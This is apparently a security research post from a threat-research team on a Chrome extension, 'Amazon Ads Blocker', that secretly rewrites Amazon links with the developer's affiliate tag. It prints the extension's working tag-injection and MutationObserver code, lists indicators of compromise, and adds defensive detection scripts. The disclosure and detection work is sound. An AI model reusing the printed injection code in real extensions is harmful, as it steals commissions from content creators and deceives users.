Malicious Chrome Extension Performs Hidden Affiliate Hijacking

A Chrome extension claiming to hide Amazon ads was found secretly hijacking affiliate links, replacing creators’ tags with its own without user consent.

Kush Pandya

January 27, 2026

Socket's Threat Research Team identified a malicious Chrome extension, Amazon Ads Blocker, that markets itself as a tool to hide sponsored content on Amazon. The extension does block ads as advertised, but its primary function is hidden: it automatically injects the developer's affiliate tag (10xprofit-20) into every Amazon product link and replaces existing affiliate codes from content creators.

While the Chrome Web Store listing includes an affiliate disclosure, the disclosure describes a fundamentally different product than what the code implements. The extension also violates core Chrome Web Store policies implemented in June 2025 following the PayPal Honey incident, in which the coupon-finding extension was found to replace creator affiliate cookies with its own at checkout, regardless of whether it provided any discount to users. The Amazon Ads Blocker extension remains available in the Chrome Web Store at the time of writing.

Update (January 29, 2026): Amazon Ads Blocker is part of a 29-extension network that targets multiple e-commerce platforms including Amazon, AliExpress, Best Buy, Shopify, and Shein. We updated the IOCs and research post to reflect this campaign.

Socket’s AI Scanner detecting the affiliate-hijacking behavior of Amazon Ads Blocker extension.

Advertised Functionality

The Chrome Web Store listing describes Amazon Ads Blocker as a tool to "Browse Amazon without 'Sponsored' ads" that "enhances your shopping experience by hiding sponsored product blocks." The extension requests permissions for storage and access to 23 Amazon domains worldwide. The manifest declares a single purpose: ad blocking via CSS manipulation of sponsored content markers.

The extension does provide the advertised ad-blocking functionality. It identifies sponsored products by detecting Amazon's AdHolder and s-sponsored-list-item classes, marks them with a custom ab-sponsored class, and hides them using CSS. Users can toggle this feature on and off through the extension popup.

The Hidden Mechanism

The affiliate hijacking code lives in content.js. After the extension initializes its ad-blocking logic, it calls initAffiliateLinker(), which rewrites every Amazon product link on the page. The snippet below shows the actual code, with our inline comments added:

const AFFILIATE_TAG = "10xprofit-20";

function initAffiliateLinker() {
    const links = document.querySelectorAll('a[href*="/dp/"], a[href*="/gp/product/"]');

    links.forEach(link => {
        try {
            const url = new URL(link.href);
            if (url.hostname.includes('amazon')) {
                const params = url.searchParams;
                if (params.has('tag')) {
                    const currentTag = params.get('tag');
                    if (currentTag !== AFFILIATE_TAG) {
                        params.set('tag', AFFILIATE_TAG);  // Replaces existing tags
                    }
                } else {
                    params.append('tag', AFFILIATE_TAG);
                }
                link.href = url.toString();
            }
        } catch (e) {
            // invalid url, ignore
        }
    });
}

The code targets all links containing /dp/ or /gp/product/ (Amazon's product URL patterns). If a link already has an affiliate tag, the extension replaces it with 10xprofit-20. If no tag exists, it appends the attacker's tag. This happens automatically on page load without any user interaction.

A MutationObserver monitors the DOM for changes and re-injects affiliate tags whenever new content loads:

function startAdObserver() {
    markAds();

    const observer = new MutationObserver((mutations) => {
        let shouldUpdate = false;
        for (const mutation of mutations) {
            if (mutation.addedNodes.length) {
                shouldUpdate = true;
                break;
            }
        }
        if (shouldUpdate) {
            markAds();
            initAffiliateLinker();  // Re-tags all links on DOM changes
        }
    });

    observer.observe(document.body, { childList: true, subtree: true });
}

This ensures the extension maintains control over affiliate tags even when Amazon loads new products via infinite scroll or AJAX requests. The user cannot disable this behavior. The extension's popup UI controls only ad blocking, with no mention of affiliate injection.
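To confirm this behavior during dynamic analysis, capture each link's href on a test page before and after the content script runs and diff the `tag` parameter. The following is an added example, not code from the extension or from Socket; the host allowlist, function names, and capture data are constructed assumptions.

```javascript
// Added example (not the extension's code): classify affiliate-tag changes
// between link hrefs captured before and after a content script ran.
const PRODUCT_PATH = /\/(?:dp|gp\/product)\//; // URL patterns named in the post
// Constructed subset; the extension itself requests 23 Amazon domains.
const AMAZON_HOSTS = new Set(["www.amazon.com", "www.amazon.co.uk"]);

function classifyTagChange(beforeHref, afterHref) {
  let before, after;
  try {
    before = new URL(beforeHref);
    after = new URL(afterHref);
  } catch (e) {
    return { kind: "invalid" };
  }
  if (!AMAZON_HOSTS.has(after.hostname) || !PRODUCT_PATH.test(after.pathname)) {
    return { kind: "out-of-scope" };
  }
  const was = before.searchParams.get("tag");
  const now = after.searchParams.get("tag");
  if (was === now) return { kind: "unchanged" };
  if (was === null) return { kind: "injected", now };
  if (now === null) return { kind: "stripped", was };
  return { kind: "replaced", was, now }; // an existing code was overwritten
}

function summarize(pairs) {
  const report = { replaced: 0, injected: 0, gained: {}, lost: {} };
  for (const [b, a] of pairs) {
    const c = classifyTagChange(b, a);
    if (c.kind !== "replaced" && c.kind !== "injected") continue;
    report[c.kind] += 1;
    report.gained[c.now] = (report.gained[c.now] || 0) + 1;
    if (c.kind === "replaced") report.lost[c.was] = (report.lost[c.was] || 0) + 1;
  }
  return report;
}

// Constructed capture: [href before, href after]; product IDs are placeholders.
const CAPTURE = [
  ["https://www.amazon.com/dp/B000000001?tag=creator-20",
   "https://www.amazon.com/dp/B000000001?tag=10xprofit-20"],
  ["https://www.amazon.com/gp/product/B000000002",
   "https://www.amazon.com/gp/product/B000000002?tag=10xprofit-20"],
  ["https://www.amazon.com/s?k=usb+cable", "https://www.amazon.com/s?k=usb+cable"],
  ["not a url", "not a url"],
];

console.log(summarize(CAPTURE));
```

The `replaced` count is the evidence that matters for a policy report, since it shows an existing creator code being overwritten rather than an empty slot being filled.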

The Misleading Disclosure

Amazon Ads Blocker listing on Chrome Web Store with the deceptive affiliate disclosure

The Chrome Web Store listing includes an affiliate disclosure at the bottom of the overview section:

"AFFILIATE DISCLOSURE: This extension uses affiliate links. When you reveal a coupon code or deal and make a purchase through our links, we may earn a small commission at no additional cost to you. This helps us keep the extension free and constantly updated with new working codes."

This disclosure is not only misleading but also violates Chrome Web Store policies. Google updated its Affiliate Ads Policy in June 2025, requiring that extensions using affiliate links must:

  • Provide direct, transparent user benefit (discounts, cashback, donations)
  • Require user action before each injection
  • Never replace existing affiliate codes
  • Disclose accurately how the program works

Amazon Ads Blocker violates the core requirements even with disclosure present:

1. No User Benefit

The extension provides no discount, cashback, or donation. Ad blocking is unrelated to affiliate injection. The disclosure justifies the program as keeping the extension "free and updated," but Chrome's policy requires tangible benefits to users, not funding for developers.

2. No User Action

Tags are injected automatically via MutationObserver without any user interaction. The disclosure's phrase "when you reveal a coupon code or deal" is factually incorrect—no reveal action exists in the code. Users simply browse Amazon while the extension operates in the background.

3. Tag Replacement

The code explicitly checks for existing tags and replaces them:

if (params.has('tag')) {
    const currentTag = params.get('tag');
    if (currentTag !== AFFILIATE_TAG) {
        params.set('tag', AFFILIATE_TAG);
    }
}

The disclosure never mentions this behavior, stating only that purchases "through our links" may earn commission.

4. Misleading Disclosure

The disclosure describes a coupon/deal extension with user-triggered reveals. The actual product is an ad blocker with automatic link modification. This mismatch between disclosure and implementation creates false consent.

The extension also violates the Single Purpose policy by combining two unrelated functions (ad blocking and affiliate injection) that should be separate extensions.

Impact

Content creators who share Amazon product links with their own affiliate tags lose commissions when users with this extension installed click those links. A YouTuber recommending a product with tag creator-20 will see their tag replaced with 10xprofit-20 before the user completes the purchase. The creator earns nothing while the extension developer receives the full commission.

Amazon Associates typically pays 1-10% commission depending on product category. The extension developer accumulates these commissions passively across all users' purchases. Users receive no benefit from this monetization beyond the stated ad-blocking functionality, which operates independently of the affiliate system.

The extension also sets an uninstall URL pointing to https://10xprofit[.]io/tools/?utm_source=chrome-extension, which opens in the browser when users remove the extension. This is used for tracking uninstall rates and potentially re-engaging users.

Coordinated Spam Operation

Amazon Ads Blocker is one of 29 extensions operated under the 10xprofit brand. The network targets multiple e-commerce platforms including Amazon, AliExpress, Best Buy, Shopify, and Shein. All extensions share the same backend infrastructure (10xprofit.io) and exhibit similar patterns:

  • Legitimate utility features (ad blocking, price tracking, product research tools)
  • Hidden affiliate injection in the background
  • Shared code infrastructure and obfuscation techniques
  • Post-June 2025 policy enforcement updates

Analysis of the extension network reveals two primary categories:

Affiliate Injection Extensions: Modify product links across e-commerce platforms to insert affiliate codes. Amazon-focused extensions use tag 10xprofit-20, while AliExpress extensions use affiliate key _c3pFXV63 with deep link redirects. Some replace existing affiliate tags (like Amazon Ads Blocker), while others only inject when no tag exists. All operate without user action or clear disclosure.

Data Collection Extensions: Scrape comprehensive product data including prices, seller information, and inventory levels, then transmit to app[.]10xprofit[.]io/api/v1 endpoints. Users are not informed their browsing activity is being monitored and sent to external servers.

Deceptive UI Extensions: Some extensions include additional dark patterns beyond affiliate injection. The AliExpress extension creates fake "LIMITED TIME DEAL" countdown timers on product pages to manipulate users into rushed purchase decisions. When no legitimate timer exists, the extension generates fake countdowns (2-15 hours) based on product IDs, creating false urgency to increase conversion rates on affiliate links.

The coordinated nature of the operation (a shared developer account, consistent backend infrastructure, and systematic policy violations across multiple platforms and extensions) indicates a deliberate strategy rather than isolated oversights. The developer continues to update and publish new extensions after Chrome's June 2025 policy enforcement date.

Socket has identified 28 additional extensions in this network operating across Amazon, AliExpress, Best Buy, Shopify, and Shein.

Outlook and Recommendations

This extension demonstrates how disclosure alone doesn't ensure compliance when the disclosed behavior differs from the implemented behavior. The Chrome Web Store listing describes a coupon extension with user-triggered actions, while the code implements an ad blocker with automatic background injection. This pattern allows extensions to pass initial review while violating policy intent.

The extension follows the same commission hijacking pattern as PayPal Honey, which prompted Google's 2025 policy update. Amazon Ads Blocker was updated in January 2026, after the June 2025 policy enforcement date, suggesting either unfamiliarity with the new requirements or deliberate avoidance through misleading disclosure.

Similar patterns are likely to appear in other shopping and deal extensions. Extensions that combine unrelated functionality (ad blocking, price comparison, coupon finding) with affiliate injection should be treated as high-risk, particularly those with disclosures that don't match the actual code behavior.

Legitimate use cases for affiliate links in extensions exist: extensions can provide cashback, aggregate coupons, or donate commissions to charity. These require accurate disclosure that matches the implementation and user opt-in for each injection, and they must never replace existing affiliate codes. Amazon Ads Blocker implements none of these requirements despite having a disclosure present.

For Users

  • Uninstall this extension immediately
  • Check installed extensions for affiliate disclosures that don't match functionality
  • Compare extension descriptions against disclosed monetization methods
  • Use established ad blockers from verified developers
  • Report extensions with misleading disclosures using the "Report abuse" button

For Security Teams

  • Report to Chrome Web Store security team with evidence of disclosure mismatch
  • Flag affiliate tag 10xprofit-20 with Amazon Associates for investigation
  • Monitor for extensions where the disclosure describes a different product than the code implements
  • Check extension update patterns against policy enforcement dates
  • Look for automatic injection patterns paired with coupon/deal disclosure language
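One way to triage for the automatic injection pattern in the last item is a static pass over an extension's content script. This is an added example, not Socket's scanner or the extension's code; the check names, the single-parameter list, and the condensed sample are assumptions, and regex heuristics like these will miss obfuscated code.

```javascript
// Added example: static triage of a content script for the affiliate-rewrite
// pattern described in this post. Heuristic only.
const AFFILIATE_PARAMS = ["tag"]; // from the page; extend per platform (assumption)

const paramAlt = AFFILIATE_PARAMS.join("|");
const CHECKS = {
  // .set('tag', ...) overwrites an existing affiliate code
  replacesTag: new RegExp(`\\.set\\(\\s*['"](?:${paramAlt})['"]`),
  // .append('tag', ...) adds a code where none existed
  injectsTag: new RegExp(`\\.append\\(\\s*['"](?:${paramAlt})['"]`),
  // selector or string targeting Amazon product URL patterns
  targetsProductLinks: /\/dp\/|\/gp\/product\//,
  // re-runs on DOM changes, with no per-injection user action
  usesMutationObserver: /new\s+MutationObserver\s*\(/,
  // any user-gesture handler; its absence suggests fully automatic behaviour
  hasUserGesture: /addEventListener\(\s*['"](?:click|submit|keydown)['"]/,
};

function triageContentScript(source) {
  const hit = {};
  for (const [name, re] of Object.entries(CHECKS)) hit[name] = re.test(source);

  const violations = [];
  const touchesTags = hit.replacesTag || hit.injectsTag;
  if (hit.replacesTag) violations.push("replaces existing affiliate codes");
  if (touchesTags && !hit.hasUserGesture)
    violations.push("no user action before injection");
  if (touchesTags && hit.usesMutationObserver)
    violations.push("re-injects on DOM changes");
  return { hit, violations, flagged: touchesTags && hit.targetsProductLinks };
}

// Constructed sample: condensed from the snippet quoted in this post.
const SAMPLE = `
const AFFILIATE_TAG = "10xprofit-20";
function initAffiliateLinker() {
  document.querySelectorAll('a[href*="/dp/"]').forEach(link => {
    const url = new URL(link.href);
    const params = url.searchParams;
    if (params.has('tag')) params.set('tag', AFFILIATE_TAG);
    else params.append('tag', AFFILIATE_TAG);
    link.href = url.toString();
  });
}
new MutationObserver(() => initAffiliateLinker())
  .observe(document.body, { childList: true, subtree: true });
`;

console.log(triageContentScript(SAMPLE));
```

A flagged script is a candidate for manual review against the store listing's disclosure text, which is where the mismatch described above becomes visible.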

Socket's Chrome extension protection analyzes extension bundles for hidden affiliate injection, compares disclosed behavior against actual code implementation, and blocks policy violations before they reach user endpoints.

MITRE ATT&CK

  • T1176.001 — Browser Extensions
  • T1059.007 — JavaScript Execution
  • T1657 — Financial Theft

Indicators of Compromise


Threat Actor

  • Chrome Handle: 10Xprofit, ecomstal.official
  • Registered Email: 10xprofitio@gmail[.]com, ecomstal.official@gmail[.]com